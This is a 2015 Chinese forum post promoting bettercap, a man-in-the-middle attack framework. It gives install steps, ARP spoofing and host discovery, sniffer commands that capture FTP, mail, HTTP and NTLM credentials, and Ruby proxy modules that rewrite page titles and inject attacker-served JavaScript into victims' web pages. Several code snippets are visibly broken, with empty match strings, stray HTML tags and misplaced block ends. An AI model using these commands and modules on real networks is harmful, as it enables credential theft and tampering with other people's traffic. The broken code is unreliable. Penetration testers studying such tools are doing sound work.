本帖最后由 90_ 于 2015-7-28 02:43 编辑
bettercap是一款完整,模块化,轻量级,易扩展的中间人攻击测试工具和框架。
安装
稳定版本(GEM)gem install bettercap
源码编译
git clone https://github.com/evilsocket/bettercap
cd bettercap
gem build bettercap.gemspec
sudo gem install bettercap*.gem
所有的依赖库都会通过GEM自动安装。为了保证正常运行,在某些情况下你可能需要安装一些系统依赖
sudo apt-get install ruby-dev libpcap-dev
你为什么需要bettercap
另一个中间人攻击工具?这是真的呢!!
这不正是你现在正在想的么?好了现在给你5分钟时间思考,或许你会这么问:
一款完整,模块化,轻量级,易扩展的中间人攻击工具和框架真的存在么?
如果你的回答是“ettercap”,那么让我来告诉你一些事:
1.ettercap是一款不可多得的工具,但已经过时了。
2.我们发现ettercap的过滤十分简单,已经成为了过去式。并且也没有那么多的C开发者愿意继续维护这个项目。
3.ettercap在大网络下十分不稳定,如果你尝试在大型网络使用ettercap的主机探索功能,你就知道有多蛋疼了。
4.对的,你可以看到连接和raw pcap。很漂亮的一款玩具,但是作为一名专用人员我只想看到我想要的东西。
5.除非你是一名C\C++开发者,那么你不能够轻松扩展ettercap,更别谈什么制作自己的模块了。
事实上你使用的不仅仅是一款工具,或许还会使用到arpspoof进行Arp欺骗,mitmproxy拦截HTTP内容并注入你的payload等等。对于我来说,我很讨厌进行一项简单的攻击却需要使用一大堆的工具来进行操作。
所以bettercap诞生了!
主机发现+Arp中间人
你可以将整个本地网络或者一个有针对性的IP地址作为目标,这都没有关系。bettercap arp spoofing功能以及它的多个主机发现代理能够将令人烦躁的步骤简化。你只需要启动工具,然后等待它完成工作。
凭证嗅探器
内置的嗅探器目前能够分析打印如下网络内容:1.被访问的URLs
2.被访问过的HTTPS主机
3.HTTP发布过的数据
4.HTTP Basic认证以及摘要认证
5.FTP凭证
6.IRC凭证
7.POP, IMAP以及SMTP凭证
8.NTLMv1/v2 ( HTTP, SMB, LDAP等) 凭证
示例:
嗅探器默认的模式,所有解析器启用:sudo bettercap -X
启用嗅探器,启用指定解析器:
sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"
启用嗅探器+所有解析器,此外并解析本地通信sudo bettercap -X -L
模块化的透明代理
一个模块化的透明代理,可以从使用–proxy参数开始。除非你记录HTTP请求,在默认情况下他不会做任何事。当然你也可以指定一个–proxy-module参数,这样你就可以加载自己的模块,随意操作HTTP流量咯。
你可以在我的github项目中找到一些示范样列
示例:
默认端口(8080)启用代理,不带任何模块
sudo bettercap --proxy
使用自定义端口启用代理sudo bettercap --proxy --proxy-port=8081
启用代理并加载hack_title.rb模块sudo bettercap --proxy --proxy-module=hack_title.rb
禁用spoofer并启用代理(独立代理模式)sudo bettercap -S NONE --proxy
模块:
使用模块你可以十分轻松的将数据注入到页面中,下面这个简单模块可以将一些内容注入到html页面的标签中。
[PHP] 纯文本查看 复制代码 class HackTitle < Proxy::Module
def on_request( request, response ) # is it a html page?
if response.content_type == 'text/html'
Logger.info "Hacking http://#{request.host}#{request.url} title tag"
# make sure to use sub! or gsub! to update the instance
response.body.sub!( '', '<title> !!! HACKED !!! ' ) end
[PHP] 纯文本查看 复制代码 class InjectJS < Proxy::Module
def on_request( request, response )
# is it a html page?<br> if response.content_type == 'text/html'
Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
# get the local interface address and HTTPD port<br> localaddr = Context.get.iface[:ip_saddr]
localport = Context.get.options[:httpd_port]
# inject the js<br> response.body.sub!( '', "" )
end
end
end
接着使用它就能将JS文件注入到HTTP响应中,使用bettercap来管理这个文件[PHP] 纯文本查看 复制代码 sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb
| 
发表于 2015-7-28 02:40:51
发表于 2015-7-28 19:58:54
